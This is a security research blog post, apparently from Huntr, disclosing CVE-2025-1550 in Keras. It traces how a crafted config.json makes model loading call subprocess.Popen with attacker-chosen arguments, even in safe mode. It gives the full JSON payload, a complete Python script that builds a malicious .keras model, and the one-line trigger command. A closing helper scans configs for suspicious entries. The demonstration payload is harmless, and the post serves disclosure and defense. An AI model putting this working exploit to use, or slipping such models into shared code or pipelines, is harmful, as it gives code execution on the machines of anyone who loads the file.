Before Google even filed CVE-2025-1550, one of our Huntr researchers, Mevlüt Akçam (aka mvlttt on huntr), quietly unearthed a critical flaw that delivers arbitrary code execution the moment you load a malformed .keras model—or, astonishingly, even a JSON file. In the post below, they’ll walk you step-by-step through the discovery process and unpack their proof-of-concept.

First Step to the MFV Program: A Review on Keras

When I looked into the MFV program launched by Huntr, it struck me as both technically meaningful and feasible, and Keras stood out as a suitable target to evaluate within it.

Before starting the work, it is worth examining the general structure and objectives of the program in detail. This makes it clearer what needs to be done and how to set the goals.

Our first goal is to select a machine learning model and craft it so that malicious code runs during the loading process. The main purpose at this point is to evaluate the security vulnerabilities that can occur while a model is being loaded.

Target and Methodology

The main goal of the study can be summarized as follows:

- Selection of a commonly used machine learning model

- Detection of security vulnerabilities in the model loading process

- Research on possibilities of executing malicious code using these vulnerabilities

In this blog, we'll examine the Keras model format in depth, addressing a vulnerability that could provide remote code execution (RCE) capability during model loading.

Keras Model Structure and Loading Process

When a model is created and saved in Keras, it is stored in a structure consisting of three basic components:

- **config.json**: Contains model architecture and configuration information

- **metadata.json**: Contains metadata information about the model

- **model.weights.h5**: Stores the trained weights of the model in HDF5 format

These three files are packed into a single ZIP archive and saved with a `.keras` extension. Our vulnerability research will focus specifically on the `config.json` file, because the model structure is reconstructed from the content of this file.
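To make the archive layout concrete, here is a minimal sketch that uses only the Python standard library. It builds a stand-in archive in memory (the file contents are placeholders, not a real Keras model) and reads `config.json` from it, the same way a real `.keras` file could be inspected. The helper name `read_keras_config` is hypothetical and not part of Keras.

```python
import io
import json
import zipfile


def read_keras_config(archive):
    """Return (sorted member names, parsed config.json) for a .keras-style ZIP."""
    with zipfile.ZipFile(archive, "r") as zf:
        names = sorted(zf.namelist())
        config = json.loads(zf.read("config.json").decode("utf-8"))
    return names, config


# Build a placeholder archive in memory; a real model would hold real data.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as zf:
    zf.writestr(
        "config.json",
        json.dumps({"class_name": "Sequential", "config": {"layers": []}}),
    )
    zf.writestr("metadata.json", json.dumps({"keras_version": "placeholder"}))
    zf.writestr("model.weights.h5", b"")  # empty stand-in for the HDF5 weights

buffer.seek(0)
names, config = read_keras_config(buffer)
print(names)
print(config["class_name"])
```

Passing a path such as `"model.keras"` instead of the in-memory buffer should work the same way, since `zipfile.ZipFile` accepts both.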

Understanding the Loading Process

Now, let's take a brief look at Keras's model loading process. Loading starts with the `load_model` function, which follows different paths depending on the type of model and the file extension. I will skip those parts here and focus directly on the internal process where the model is loaded.

When the `_load_model_from_fileobj` function is called, the content of the ZIP file is extracted and the rebuilding of the model begins. At this stage, the `config.json` file is read and the `_model_from_config` function comes into play. After the JSON object is loaded into memory, the `deserialize_keras_object` function is called to convert the serialized structure back into an object.

Identifying Exploitable Sections

When we examine the deserialize_keras_object function in detail, we encounter two noteworthy sections after skipping some insignificant code blocks. The first one is:

```python
if class_name == "function":
    fn_name = inner_config
    return _retrieve_class_or_fn(
        fn_name,
        registered_name,
        module,
        obj_type="function",
        full_config=config,
        custom_objects=custom_objects,
    )
```

If the `class_name` value from the `config.json` file is `"function"`, the `_retrieve_class_or_fn` function is called and the following code is executed:

```python
try:
    mod = importlib.import_module(module)
except ModuleNotFoundError:
    raise TypeError(
        f"Could not deserialize {obj_type} '{name}' because "
        f"its parent module {module} cannot be imported. "
        f"Full object config: {full_config}"
    )
obj = vars(mod).get(name, None)

# Special case for keras.metrics.metrics
if obj is None and registered_name is not None:
    obj = vars(mod).get(registered_name, None)

if obj is not None:
    return obj
```

The module is imported, and the named object is looked up in it and returned. Here, you might think of adding a Python file directly to the Keras model and importing it. However, when the `.keras` archive is opened, its contents are extracted to a temporary directory, and the Python process that imported Keras will not be able to import a file from this temporary directory.

At this point, we can already retrieve a function such as `os.system`, which would give us simple remote code execution (RCE) if we could also call it. However, when I examined whether we could call this object and control its parameters from this code path, I found that it was not really possible.
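The lookup pattern itself is easy to reproduce outside Keras. The sketch below is a simplified stand-in, not the Keras implementation: the helper name `resolve` is hypothetical, and it only mirrors the `importlib.import_module` plus `vars(mod).get(...)` steps from the snippet above. It shows that two strings are enough to obtain a reference to `os.system`, while nothing in this path calls it.

```python
import importlib


def resolve(module, name):
    """Import a module by its string name and fetch one attribute by string name."""
    mod = importlib.import_module(module)
    return vars(mod).get(name, None)


# In the real scenario both strings would come from the attacker-controlled config.
obj = resolve("os", "system")
print(obj)            # a reference to the function object
print(callable(obj))  # it is only returned here, never called

# Unknown names simply resolve to None.
print(resolve("os", "does_not_exist"))
```

This is why the "function" branch alone is not enough for exploitation: it hands back a callable, but a second primitive is needed to invoke it with chosen arguments.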

As we continue reading the code, this section stands out:

```python
cls = _retrieve_class_or_fn(
    class_name,
    registered_name,
    module,
    obj_type="class",
    full_config=config,
    custom_objects=custom_objects,
)

if isinstance(cls, types.FunctionType):
    return cls
if not hasattr(cls, "from_config"):
    raise TypeError(
        f"Unable to reconstruct an instance of '{class_name}' because "
        f"the class is missing a `from_config()` method. "
        f"Full object config: {config}"
    )

# Instantiate the class from its config inside a custom object scope
# so that we can catch any custom objects that the config refers to.
custom_obj_scope = object_registration.CustomObjectScope(custom_objects)
safe_mode_scope = SafeModeScope(safe_mode)
with custom_obj_scope, safe_mode_scope:
    try:
        instance = cls.from_config(inner_config)
    except TypeError as e:
        raise TypeError(
            f"{cls} could not be deserialized properly. Please"
            " ensure that components that are Python object"
            " instances (layers, models, etc.) returned by"
            " `get_config()` are explicitly deserialized in the"
            " model's `from_config()` method."
            f"\n\nconfig={config}.\n\nException encountered: {e}"
        )
    build_config = config.get("build_config", None)
    if build_config and not instance.built:
        instance.build_from_config(build_config)
        instance.built = True
    compile_config = config.get("compile_config", None)
    if compile_config:
        instance.compile_from_config(compile_config)
        instance.compiled = True
```

Here, the `_retrieve_class_or_fn` function is called again, and this time a method of the returned class is invoked with input that we control. However, despite all my examinations, I could not find an exploitable implementation of the `from_config`, `build_from_config`, or `compile_from_config` methods, except for one.

When I examined the `from_config` method of the Model class in the `src/models/model.py` file, I saw that the `functional_from_config` method was called.

```python
def functional_from_config(cls, config, custom_objects=None):
    """Instantiates a Functional model from its config (from `get_config()`).

    Args:
        cls: Class of the model, e.g. a custom subclass of `Model`.
        config: Output of `get_config()` for the original model instance.
        custom_objects: Optional dict of custom objects.

    Returns:
        An instance of `cls`.
    """
    # Layer instances created during
    # the graph reconstruction process
    created_layers = {}

    # Dictionary mapping layer instances to
    # node data that specifies a layer call.
    # It acts as a queue that maintains any unprocessed
    # layer call until it becomes possible to process it
    # (i.e. until the input tensors to the call all exist).
    unprocessed_nodes = {}

    def add_unprocessed_node(layer, node_data):
        """Add node to layer list

        Arg:
            layer: layer object
            node_data: Node data specifying layer call
        """
        if layer not in unprocessed_nodes:
            unprocessed_nodes[layer] = [node_data]
        else:
            unprocessed_nodes[layer].append(node_data)

    def process_node(layer, node_data):
        """Reconstruct node by linking to inbound layers

        Args:
            layer: Layer to process
            node_data: List of layer configs
        """
        args, kwargs = deserialize_node(node_data, created_layers)
        # Call layer on its inputs, thus creating the node
        # and building the layer if needed.
        layer(*args, **kwargs)

    def process_layer(layer_data):
        """Deserializes a layer and index its inbound nodes.

        Args:
            layer_data: layer config dict.
        """
        layer_name = layer_data["name"]

        # Instantiate layer.
        if "module" not in layer_data:
            # Legacy format deserialization (no "module" key)
            # used for H5 and SavedModel formats
            layer = saving_utils.model_from_config(
                layer_data, custom_objects=custom_objects
            )
        else:
            layer = serialization_lib.deserialize_keras_object(
                layer_data, custom_objects=custom_objects
            )
        created_layers[layer_name] = layer

        # Gather layer inputs.
        inbound_nodes_data = layer_data["inbound_nodes"]
        for node_data in inbound_nodes_data:
            # We don't process nodes (i.e. make layer calls)
            # on the fly because the inbound node may not yet exist,
            # in case of layer shared at different topological depths
            # (e.g. a model such as A(B(A(B(x)))))
            add_unprocessed_node(layer, node_data)

    # Extract config used to instantiate Functional model from the config. The
    # remaining config will be passed as keyword arguments to the Model
    # constructor.
    functional_config = {}
    for key in ["layers", "input_layers", "output_layers"]:
        functional_config[key] = config.pop(key)
    for key in ["name", "trainable"]:
        if key in config:
            functional_config[key] = config.pop(key)
        else:
            functional_config[key] = None

    # First, we create all layers and enqueue nodes to be processed
    for layer_data in functional_config["layers"]:
        process_layer(layer_data)

    # Then we process nodes in order of layer depth.
    # Nodes that cannot yet be processed (if the inbound node
    # does not yet exist) are re-enqueued, and the process
    # is repeated until all nodes are processed.
    while unprocessed_nodes:
        for layer_data in functional_config["layers"]:
            layer = created_layers[layer_data["name"]]

            # Process all nodes in layer, if not yet processed
            if layer in unprocessed_nodes:
                node_data_list = unprocessed_nodes[layer]

                # Process nodes in order
                node_index = 0
                while node_index < len(node_data_list):
                    node_data = node_data_list[node_index]
                    try:
                        process_node(layer, node_data)

                    # If the node does not have all inbound layers
                    # available, stop processing and continue later
                    except IndexError:
                        break

                    node_index += 1

                # If not all nodes processed then store unprocessed nodes
                if node_index < len(node_data_list):
                    unprocessed_nodes[layer] = node_data_list[node_index:]
                # If all nodes processed remove the layer
                else:
                    del unprocessed_nodes[layer]

    # Create list of input and output tensors and return new class
    name = functional_config["name"]
    trainable = functional_config["trainable"]
```

When examining this method, we see that the `process_layer` function creates a layer from each entry in `functional_config["layers"]`. Then, the `add_unprocessed_node` function is called (i.e., the created layer is added to the `unprocessed_nodes` dictionary). Afterwards, this layer object is called inside the `process_node` function, and its arguments are also values that we control. If we can pass the arguments with the correct types and without any changes, we will be able to achieve our goal.

```python
def deserialize_node(node_data, created_layers):
    """Return (args, kwargs) for calling the node layer."""
    if not node_data:
        return [], {}

    if isinstance(node_data, list):
        # Legacy case.
        # ... more code
        return [unpack_singleton(input_tensors)], kwargs

    args = serialization_lib.deserialize_keras_object(node_data["args"])
    kwargs = serialization_lib.deserialize_keras_object(node_data["kwargs"])

    def convert_revived_tensor(x):
        if isinstance(x, backend.KerasTensor):
            history = x._pre_serialization_keras_history
            if history is None:
                return x
            layer = created_layers.get(history[0], None)
            if layer is None:
                raise ValueError(f"Unknown layer: {history[0]}")
            inbound_node_index = history[1]
            inbound_tensor_index = history[2]
            if len(layer._inbound_nodes) <= inbound_node_index:
                raise IndexError(
                    "Layer node index out of bounds.\n"
                    f"inbound_layer = {layer}\n"
                    f"inbound_layer._inbound_nodes = {layer._inbound_nodes}\n"
                    f"inbound_node_index = {inbound_node_index}"
                )
            inbound_node = layer._inbound_nodes[inbound_node_index]
            return inbound_node.output_tensors[inbound_tensor_index]
        return x

    args = tree.map_structure(convert_revived_tensor, args)
    kwargs = tree.map_structure(convert_revived_tensor, kwargs)
    return args, kwargs
```

`deserialize_node` converts the `inbound_nodes` values in the config data and also deserializes them with `deserialize_keras_object`. However, none of these conversions matter to us at this stage: when we provide plain values such as strings, they are returned as is, without any type conversion.
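The two-phase flow described above (create every layer, then call each one with the arguments stored in its `inbound_nodes`) can be modeled with a toy sketch. This is a deliberately simplified stand-in and not Keras code: the helper names `resolve_function` and `rebuild` are hypothetical, error handling and tensor conversion are omitted, and a harmless function (`operator.add`) is used in place of anything dangerous.

```python
import importlib


def resolve_function(layer_data):
    """Stand-in for the "function" branch: look the name up in the named module."""
    mod = importlib.import_module(layer_data["module"])
    return vars(mod)[layer_data["config"]]


def rebuild(layers):
    """Toy version of the flow: create every 'layer' first, then call each one."""
    created, pending, results = {}, [], []

    # Phase 1 (like process_layer): resolve objects and queue their calls.
    for layer_data in layers:
        layer = resolve_function(layer_data)
        created[layer_data["name"]] = layer
        for node_data in layer_data.get("inbound_nodes", []):
            pending.append((layer, node_data))

    # Phase 2 (like process_node): plain values pass through unchanged.
    for layer, node_data in pending:
        args, kwargs = node_data["args"], node_data["kwargs"]
        results.append(layer(*args, **kwargs))
    return results


# Harmless payload: the config chooses both the callable and its arguments.
layers = [
    {
        "name": "demo",
        "class_name": "function",
        "module": "operator",
        "config": "add",
        "inbound_nodes": [{"args": [2, 3], "kwargs": {}}],
    }
]
print(rebuild(layers))
```

The point of the sketch is the combination: the lookup supplies an arbitrary callable, and the node-processing step supplies the call with attacker-chosen `args` and `kwargs`.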

Crafting the Exploit

Now we can put all the pieces together.

- First, we will create a layer of Model type.

```json
{
  "config": {
    "layers": [
      {
        "module": "keras.models",
        "class_name": "Model",
        "config": {}
      }
    ]
  }
}
```

- Then, we will create another layer in the config values of this model and call this layer through a method.

```json
{
  "config": {
    "layers": [
      {
        "module": "keras.models",
        "class_name": "Model",
        "config": {
          "layers": [
            {
              "module": "keras.models",
              "class_name": "Model",
              "config": {
                "name": "mvlttt",
                "layers": [
                  {
                    "name": "mvlttt",
                    "class_name": "function",
                    "config": "Popen",
                    "module": "subprocess"
                  }
                ]
              }
            }
          ]
        }
      }
    ]
  }
}
```

- To control the parameters, we will use the `inbound_nodes` key in the config value. We will also add a few other keys to prevent some errors.

```json
{
  "config": {
    "layers": [
      {
        "module": "keras.models",
        "class_name": "Model",
        "config": {
          "layers": [
            {
              "module": "keras.models",
              "class_name": "Model",
              "config": {
                "name": "mvlttt",
                "layers": [
                  {
                    "name": "mvlttt",
                    "class_name": "function",
                    "config": "Popen",
                    "module": "subprocess",
                    "inbound_nodes": [
                      {"args": [["touch", "/tmp/1337"]], "kwargs": {"bufsize": -1}}
                    ]
                  }
                ],
                "input_layers": [["mvlttt", 0, 0]],
                "output_layers": [["mvlttt", 0, 0]]
              }
            }
          ]
        }
      }
    ]
  }
}
```

Now we're ready to create a malicious model with this configuration. The following exploit code automates the process.

```python
import json
import os
import zipfile

import numpy as np
from keras.layers import Dense
from keras.models import Sequential

model_name = "model.keras"

# Train and save a small, legitimate model to use as a carrier.
x_train = np.random.rand(100, 28 * 28)
y_train = np.random.rand(100)

model = Sequential([Dense(1, activation="linear", input_dim=28 * 28)])
model.compile(optimizer="adam", loss="mse")
model.fit(x_train, y_train, epochs=5)
model.save(model_name)

# Read the original config.json out of the archive.
with zipfile.ZipFile(model_name, "r") as f:
    config = json.loads(f.read("config.json").decode())

# Turn the first layer into a nested Model whose only "layer" is subprocess.Popen.
config["config"]["layers"][0]["module"] = "keras.models"
config["config"]["layers"][0]["class_name"] = "Model"
config["config"]["layers"][0]["config"] = {
    "name": "mvlttt",
    "layers": [
        {
            "name": "mvlttt",
            "class_name": "function",
            "config": "Popen",
            "module": "subprocess",
            "inbound_nodes": [
                {"args": [["touch", "/tmp/1337"]], "kwargs": {"bufsize": -1}}
            ],
        }
    ],
    "input_layers": [["mvlttt", 0, 0]],
    "output_layers": [["mvlttt", 0, 0]],
}

# Copy every archive member except config.json into a temporary archive.
with zipfile.ZipFile(model_name, "r") as zip_read:
    with zipfile.ZipFile(f"tmp.{model_name}", "w") as zip_write:
        for item in zip_read.infolist():
            if item.filename != "config.json":
                zip_write.writestr(item, zip_read.read(item.filename))

os.remove(model_name)
os.rename(f"tmp.{model_name}", model_name)

# Append the modified config.json to the rebuilt archive.
with zipfile.ZipFile(model_name, "a") as zf:
    zf.writestr("config.json", json.dumps(config))

print("[+] Malicious model ready")
```

Now let's load this model and trigger the vulnerability.



```shell
python3 -c 'import keras; keras.models.load_model("model.keras",safe_mode=True)' 2>/dev/null
```



Awesome, right? We can now trigger arbitrary code execution (ACE) with a valid model, and this was actually a 0-day vulnerability that was later assigned a CVE. What makes this vulnerability even more dangerous is that the `config.json` file alone can be loaded with `model_from_json` to achieve ACE; the `.keras` model isn't needed.
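Because the whole payload lives in `config.json`, its shape is easy to spot before anything is loaded. The sketch below is a rough heuristic under stated assumptions, not a complete defense: the helper name `find_suspicious_entries` is hypothetical, the rule "module must be `keras` or start with `keras.`" is an assumption made for illustration, and legitimate models that serialize custom functions may be flagged as well.

```python
def find_suspicious_entries(node, path="config"):
    """Recursively collect entries that name plain functions or non-Keras modules."""
    findings = []
    if isinstance(node, dict):
        module = node.get("module")
        if node.get("class_name") == "function":
            findings.append((path, "class_name is 'function'"))
        if (
            isinstance(module, str)
            and module != "keras"
            and not module.startswith("keras.")
        ):
            findings.append((path, f"module '{module}' is outside keras"))
        for key, value in node.items():
            findings.extend(find_suspicious_entries(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            findings.extend(find_suspicious_entries(value, f"{path}[{index}]"))
    return findings


# The inner entry from the walkthrough above, reduced to its essentials.
payload = {
    "config": {
        "layers": [
            {
                "name": "mvlttt",
                "class_name": "function",
                "config": "Popen",
                "module": "subprocess",
                "inbound_nodes": [
                    {"args": [["touch", "/tmp/1337"]], "kwargs": {"bufsize": -1}}
                ],
            }
        ]
    }
}
findings = find_suspicious_entries(payload)
for location, reason in findings:
    print(location, "->", reason)
```

The same function can be pointed at the parsed `config.json` of any `.keras` archive, read with `zipfile` and `json`, without importing Keras at all.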

(Note: Additional work was required during the research process to account for unexpected tooling behavior.)

Final Thoughts

Thanks for following along on this vulnerability discovery journey. Stay tuned for more insights and security research from our community, and happy hunting!